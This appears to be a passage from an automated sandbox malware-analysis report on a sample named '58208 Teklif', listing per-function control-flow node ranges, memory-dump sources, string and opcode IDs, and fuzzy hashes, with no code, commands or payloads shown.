1414e20 2201->2228 2206->2168 2208 141b46e-141b471 2206->2208 2207->2172 2211 141b44a-141b45e 2207->2211 2208->2168 2213 141b473-141b479 2208->2213 2209->2168 2212 141b4d5-141b4d8 2209->2212 2210->2172 2215 141b4b5-141b4c9 2210->2215 2211->2172 2220 141b464 2211->2220 2212->2166 2212->2195 2213->2185 2213->2186 2215->2172 2222 141b4cb 2215->2222 2220->2206 2222->2209 2227->2228 2230 141b691-141b69c 2228->2230 2231 141b6a3-141b6a7 2230->2231 2232 141b69e 2230->2232 2233 141b6a9-141b6aa 2231->2233 2234 141b6ac-141b6b3 2231->2234 2232->2231 2235 141b6cb-141b70f 2233->2235 2236 141b6b5 2234->2236 2237 141b6ba-141b6c8 2234->2237 2241 141b775-141b78c 2235->2241 2236->2237 2237->2235 2243 141b711-141b727 2241->2243 2244 141b78e-141b7b3 2241->2244 2247 141b751 2243->2247 2248 141b729-141b735 2243->2248 2250 141b7b5-141b7ca 2244->2250 2251 141b7cb 2244->2251 2254 141b757-141b774 2247->2254 2252 141b737-141b73d 2248->2252 2253 141b73f-141b745 2248->2253 2250->2251 2257 141b7cc 2251->2257 2255 141b74f 2252->2255 2253->2255 2254->2241 2255->2254 2257->2257
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 5630b1b962688176bbc2eb1083b9cb507144dcac958add8e7a8fd85af76df830
                                                      • Instruction ID: 8c434c2e36334eaa64f30767d38a7036d6dd019c5ae5caed3a3c6f4dcbc2d090
                                                      • Opcode Fuzzy Hash: 5630b1b962688176bbc2eb1083b9cb507144dcac958add8e7a8fd85af76df830
                                                      • Instruction Fuzzy Hash: DFE10975E00218DFDB14DFA9C984A9EBBB2FF48310F15C46AE919AB365DB30A841CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD908D Relevance: 2.7, Strings: 2, Instructions: 192COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2636 6bd908d-6bd90d8 2637 6bd90df-6bd9183 2636->2637 2638 6bd90da 2636->2638 2642 6bd9185-6bd918c 2637->2642 2643 6bd9191-6bd91e2 2637->2643 2638->2637 2644 6bd93ec-6bd940a 2642->2644 2651 6bd92b4 2643->2651 2652 6bd92bd-6bd92cb 2651->2652 2653 6bd91e7-6bd9214 2652->2653 2654 6bd92d1-6bd92f6 2652->2654 2661 6bd9235 2653->2661 2662 6bd9216-6bd921f 2653->2662 2659 6bd930e 2654->2659 2660 6bd92f8-6bd930d 2654->2660 2659->2644 2660->2659 2665 6bd9238-6bd9259 2661->2665 2663 6bd9226-6bd9229 2662->2663 2664 6bd9221-6bd9224 2662->2664 2667 6bd9233 2663->2667 2664->2667 2670 6bd925b-6bd92b1 2665->2670 2671 6bd92b2-6bd92b3 2665->2671 2667->2665 2670->2671 2671->2651
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 455982df8f219c3ce29771fea591249e707e35b3f015032c558b380308ad5599
                                                      • Instruction ID: b1a2e42f7e5dfd47305e4f92df521dbf81e7eefe42318f91ed90245c7a80087e
                                                      • Opcode Fuzzy Hash: 455982df8f219c3ce29771fea591249e707e35b3f015032c558b380308ad5599
                                                      • Instruction Fuzzy Hash: 7481E274E00218CFDB68DFA9D994BADBBF2BF89304F209169D419AB354EB345946CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141BF10 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 5a54897b4e98c96851f292aa5292ab2b2c482b2de6b25bc6e60a7def98b0d3bf
                                                      • Instruction ID: 93d4c0d26b1d3294b13ef2333e6055eb0d0f21b5f28c3281d54877d05c0bbcd9
                                                      • Opcode Fuzzy Hash: 5a54897b4e98c96851f292aa5292ab2b2c482b2de6b25bc6e60a7def98b0d3bf
                                                      • Instruction Fuzzy Hash: 8B81D674E40218CFDB14DFAAD984A9DBBF2BF89310F14C06AE419AB369DB315981CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141C7B2 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: e9993b2817a23742d1c4f4e3f3ddb20aeaaefe83a10e1335317cbcc97b9e597d
                                                      • Instruction ID: 0b264a7ae96e1dcb1df71437ce9db54f1d892a8fb5476c089c695d3d2468bcc3
                                                      • Opcode Fuzzy Hash: e9993b2817a23742d1c4f4e3f3ddb20aeaaefe83a10e1335317cbcc97b9e597d
                                                      • Instruction Fuzzy Hash: 5081C574E40218DFDB18DFAAD984A9DBBF2BF89310F14C06AE419AB369DB305841CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141C1F0 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: e91e5402be19df7d912c79b71bf40af0a4443f4473aec2603630dbe8f2fc6077
                                                      • Instruction ID: 4486005b6c79bb8ec4917458add96f85eeb1671bb5cf1d205cf8e1dd52245541
                                                      • Opcode Fuzzy Hash: e91e5402be19df7d912c79b71bf40af0a4443f4473aec2603630dbe8f2fc6077
                                                      • Instruction Fuzzy Hash: 6681D774E40218CFDB18DFAAD884A9DBBF2BF89300F14C06AE419AB369DB705945CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141C4D0 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: d7e676530cd5b9eaf9af93df10d12589d775754c58055a85470e81371dd14253
                                                      • Instruction ID: 9ed37c192712d70fbcc9c5725afd9b098cac94c8886109bb6a8a73bc32c57f7c
                                                      • Opcode Fuzzy Hash: d7e676530cd5b9eaf9af93df10d12589d775754c58055a85470e81371dd14253
                                                      • Instruction Fuzzy Hash: 2081C574E40218CFDB18DFAAD984A9DBBF2BF89310F14D06AE419AB369DB305941CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01414B31 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 4263b27211733c35cb6d46fb91d22f8b73723c351949c1aaa2191502bb899dd3
                                                      • Instruction ID: 92499ea7450a5304ef7d6c33c0d661415195db694f5ebcf801071dd434544d99
                                                      • Opcode Fuzzy Hash: 4263b27211733c35cb6d46fb91d22f8b73723c351949c1aaa2191502bb899dd3
                                                      • Instruction Fuzzy Hash: EE81B974E00218DFDB18DFAAD944A9DBBF2BF89310F15C06AE419AB369DB345981CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141CA92 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 9bdcba6d6d532784508d4e2113623fde78d99e6a633ccd450b50d8bdca4f02ad
                                                      • Instruction ID: f6a240581a138acae5f20644d65ec47a8022f82705cd2938105ef912391022d6
                                                      • Opcode Fuzzy Hash: 9bdcba6d6d532784508d4e2113623fde78d99e6a633ccd450b50d8bdca4f02ad
                                                      • Instruction Fuzzy Hash: F381C874E41218DFDB18DFAAD994A9DBBF2BF88310F14C06AE419AB369DB305941CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141BC32 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 39eb1023962acce210782f65680f91ef42581fb41665740a5b11fcb1bde8b841
                                                      • Instruction ID: 5e2e7af890290eb183681de5cb4a4a63b38c4aaee51d3800a881898fbd0a55e9
                                                      • Opcode Fuzzy Hash: 39eb1023962acce210782f65680f91ef42581fb41665740a5b11fcb1bde8b841
                                                      • Instruction Fuzzy Hash: 1681B674E00218CFDB18DFAAD994A9DBBF2FF88310F14806AE519AB365DB305945CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141B552 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 203f0135611603ce9299ceac8d59d5d1adcd7fdd04a19686124872ce6c968572
                                                      • Instruction ID: 5c15329f379743dab4079806fb9587fcfb17ddd201e52edbfa3a75181877e44a
                                                      • Opcode Fuzzy Hash: 203f0135611603ce9299ceac8d59d5d1adcd7fdd04a19686124872ce6c968572
                                                      • Instruction Fuzzy Hash: 5361C874E002489FDB18DFAAD944A9EBBF2FF88300F14C46AE518AB369DB305945CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A989B0 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4ffee7eb0a8583207fb60c1e2a43ee196ab406eb3a5efd652835210fc41bea5a
                                                      • Instruction ID: 2ef136843f6869a87e773fd81d11d0c5a024de7fa7844a12df2a534938e0c9d9
                                                      • Opcode Fuzzy Hash: 4ffee7eb0a8583207fb60c1e2a43ee196ab406eb3a5efd652835210fc41bea5a
                                                      • Instruction Fuzzy Hash: B1F1F474E01229DFDB18DFA9C894B9DBBF2BF89304F1481A9E408AB355DB349985CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD15F8 Relevance: .7, Instructions: 745COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd1fca46e46cd23568b004e35af04d14b9f4a3db29314fec6320a9c1cd23f6ac
                                                      • Instruction ID: e66358f25452d575815fc088717eca3dff86df3e28496bd98e1d5b4dd3cee7c1
                                                      • Opcode Fuzzy Hash: dd1fca46e46cd23568b004e35af04d14b9f4a3db29314fec6320a9c1cd23f6ac
                                                      • Instruction Fuzzy Hash: 28827F74E412299FDB64DF69C998BDDBBB2BF49300F1081E9A40DAB264DB315E85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD8A58 Relevance: .3, Instructions: 296COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52f267d6a7a087c0f72c64bbe1781abb8b0bdf989f66d5a8cf488f151731b999
                                                      • Instruction ID: 9771672f5e46083db27f0a4dc4f5c4c5c542610180161acc4eb6af040a03aba5
                                                      • Opcode Fuzzy Hash: 52f267d6a7a087c0f72c64bbe1781abb8b0bdf989f66d5a8cf488f151731b999
                                                      • Instruction Fuzzy Hash: 82E1D4B4E01218CFEB54DFA5D954B9DBBB2BF89300F1081AAD408AB394DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDDAC0 Relevance: .2, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dae89071158432b0bc5b1ac80a499634a5a7d2f35623573e16390c5f4a146b72
                                                      • Instruction ID: 4e324d6e1e613a99d85e590cb1295b9f0cf8ef05152b673469815c19ff6dae96
                                                      • Opcode Fuzzy Hash: dae89071158432b0bc5b1ac80a499634a5a7d2f35623573e16390c5f4a146b72
                                                      • Instruction Fuzzy Hash: 61A194B5E012188FEB54CF6AD944B9DBBF2AF89300F14D0AAD449AB254DB705A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDCE28 Relevance: .2, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 893540e2a2738c0cf6b0d794b2ad26f3a7027b3997aca0ff58d0f6e77d6e9b84
                                                      • Instruction ID: a7ab6687c3221a34c734555fa47630873f0267a2a9fae166d59bb437fd64ecd2
                                                      • Opcode Fuzzy Hash: 893540e2a2738c0cf6b0d794b2ad26f3a7027b3997aca0ff58d0f6e77d6e9b84
                                                      • Instruction Fuzzy Hash: 8CA1A4B4E012188FEB68CF6AD944B9DBBF2BF89300F14D0AAD40DA7254DB305A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDC7D8 Relevance: .2, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94efc0637141ed420bcc3179e356e3577fa8b98b1e74753c21c98b28c163210f
                                                      • Instruction ID: 37ab6c931a1946e9ac930086f268353e4b6a6332940db830d5f2ed9be96fbdfc
                                                      • Opcode Fuzzy Hash: 94efc0637141ed420bcc3179e356e3577fa8b98b1e74753c21c98b28c163210f
                                                      • Instruction Fuzzy Hash: C9A1B4B4E012188FEB64CF6AC944B9DBBF2AF89300F14D1AAD40DA7254EB345A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDBB38 Relevance: .2, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8bb2e952b9bd13d3a27248e360d370452ccd20d76ac4f4e8985f5b0e237c08f1
                                                      • Instruction ID: 751786916ac9d8321ee72ba995a8e599994c1865a53c282f312270ad3c838b10
                                                      • Opcode Fuzzy Hash: 8bb2e952b9bd13d3a27248e360d370452ccd20d76ac4f4e8985f5b0e237c08f1
                                                      • Instruction Fuzzy Hash: 6DA195B4E012288FEB64CF6AD944B9DBBF2BF89300F14D0EAD409A7254DB305A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDA858 Relevance: .2, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd6621e518408009064981fbf9580474d095e69c673fbcb38d48b13fb6bc387c
                                                      • Instruction ID: bbe83bec2e9b35677b6cb4baadcbf2ab2ef8051a67892fa3f732f41a47a605de
                                                      • Opcode Fuzzy Hash: fd6621e518408009064981fbf9580474d095e69c673fbcb38d48b13fb6bc387c
                                                      • Instruction Fuzzy Hash: 64A1A4B5E012188FEB58CF6AC944B9DFBF2AF89300F14D1AAD40DA7254EB345A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDC188 Relevance: .2, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5af545482926af7ad906988017eab9b5edfaea5a5e91a9fbafdba9dce87185c2
                                                      • Instruction ID: 850b5218bf4728f0c983c274ae74afeae0ed8e4baa931e82a3790a90f09cad41
                                                      • Opcode Fuzzy Hash: 5af545482926af7ad906988017eab9b5edfaea5a5e91a9fbafdba9dce87185c2
                                                      • Instruction Fuzzy Hash: 28A1A4B4E012188FEB64CF6AD944B9DBBF2BF89300F14D1AAD40DA7254EB705A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDAEA8 Relevance: .2, Instructions: 218COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be7940086d448a573d31a5f7119576265bba2782c0bc07bcc19f23a5cda5a19d
                                                      • Instruction ID: 623d83cb1172d25d89dfe87f6ff85c4c3e61726e7954b8db2a5c20dcfe7cf253
                                                      • Opcode Fuzzy Hash: be7940086d448a573d31a5f7119576265bba2782c0bc07bcc19f23a5cda5a19d
                                                      • Instruction Fuzzy Hash: 1AA1A5B5E012188FEB64DF6AC944B9DFBF2AF89300F14D1AAD40DA7254DB345A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDB4F0 Relevance: .2, Instructions: 218COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 83abe665ca8879eb79ee718555061fadea277485408fadc31a1634174bc2e9ac
                                                      • Instruction ID: 4fc657edf49a7ef1b6198c4e4057cdc9cdc0400632adf59f70f43fa4564bbcdd
                                                      • Opcode Fuzzy Hash: 83abe665ca8879eb79ee718555061fadea277485408fadc31a1634174bc2e9ac
                                                      • Instruction Fuzzy Hash: 10A195B5E016188FEB68CF6AC944B9DFBF2AF89300F14D1AAD409A7254DB305A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDD478 Relevance: .2, Instructions: 218COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d366911b249ee77139c77b98c055c225d1db8213142c9729796462670cc0c39
                                                      • Instruction ID: b96584a7d94baeb10aee3f12bd76f76c602a99cbbb3cce3558f8bcce07292079
                                                      • Opcode Fuzzy Hash: 6d366911b249ee77139c77b98c055c225d1db8213142c9729796462670cc0c39
                                                      • Instruction Fuzzy Hash: 7FA194B4E012188FEB64CF6AD944B9DBBF2BF89300F14D0AAD44DA7254EB345A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDAE98 Relevance: .2, Instructions: 165COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5fd74356924851a6ad4f6aef9b22c2995b2c83fc4760e0e1e88ed915d09c11e
                                                      • Instruction ID: 579d1b2f4ac45fafc2ad29fea2f5065cb3ed9f4bba94e510311c041ecb5bae47
                                                      • Opcode Fuzzy Hash: f5fd74356924851a6ad4f6aef9b22c2995b2c83fc4760e0e1e88ed915d09c11e
                                                      • Instruction Fuzzy Hash: 947175B1E016188FEB68CF6AC944B9DBBF2AF89300F14C1EAD50DA7254DB345A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDD468 Relevance: .2, Instructions: 163COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a2950791c12f5f0593238a4d5d1ea889fb14284a9e0262b9e8cdb158e649abe
                                                      • Instruction ID: 93ae6e2e438c69ff9b714381f459f83dcf4dc91e0d0266cfbc77cebde477fc2f
                                                      • Opcode Fuzzy Hash: 8a2950791c12f5f0593238a4d5d1ea889fb14284a9e0262b9e8cdb158e649abe
                                                      • Instruction Fuzzy Hash: 4C7173B1E016188FEB68CF6AC944B9DBAF2AF89300F14C1EAD44DA7254DB705A85CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD8A5D Relevance: .1, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f26a9729576886e3ac720d8f6e9fc7546a03df0ed573288c75cfb6df05178a6
                                                      • Instruction ID: ebf9cb9bc8d63f94a77e7530f3cfb0bfb5a23f1b658bdeff756961577f652901
                                                      • Opcode Fuzzy Hash: 9f26a9729576886e3ac720d8f6e9fc7546a03df0ed573288c75cfb6df05178a6
                                                      • Instruction Fuzzy Hash: 4441C2B0E012188BEB58DFAAC9547DEFBF2BF88300F14D16AC418AB294EB355945CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDBB27 Relevance: .1, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a07a586a9ee237554bf1469caadb6e96ef18eb64989d5147b43d594fdb977779
                                                      • Instruction ID: 49d1b40d18420270934b53fa48a32014cffbbe959b956e02f4a8d1b478906344
                                                      • Opcode Fuzzy Hash: a07a586a9ee237554bf1469caadb6e96ef18eb64989d5147b43d594fdb977779
                                                      • Instruction Fuzzy Hash: 8B4149B1D016188BEB58CF6BD9557D9FAF3AFC9300F14C1AAC54CA6264EB740A868F50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDC178 Relevance: .1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8617b655e3c9246d744db1a2a2783998cd0d2b2c767afdeaf6a0f1f83b4d9117
                                                      • Instruction ID: 27f5fc00c77b98075626f2182df2c08079330b1688c9249f1eb2cb1217541b75
                                                      • Opcode Fuzzy Hash: 8617b655e3c9246d744db1a2a2783998cd0d2b2c767afdeaf6a0f1f83b4d9117
                                                      • Instruction Fuzzy Hash: 8C415AB1E016188BEB58CF6BD9457D9FAF3AFC9314F04C1AAC50CA6254EB7409868F51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDCE18 Relevance: .1, Instructions: 107COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
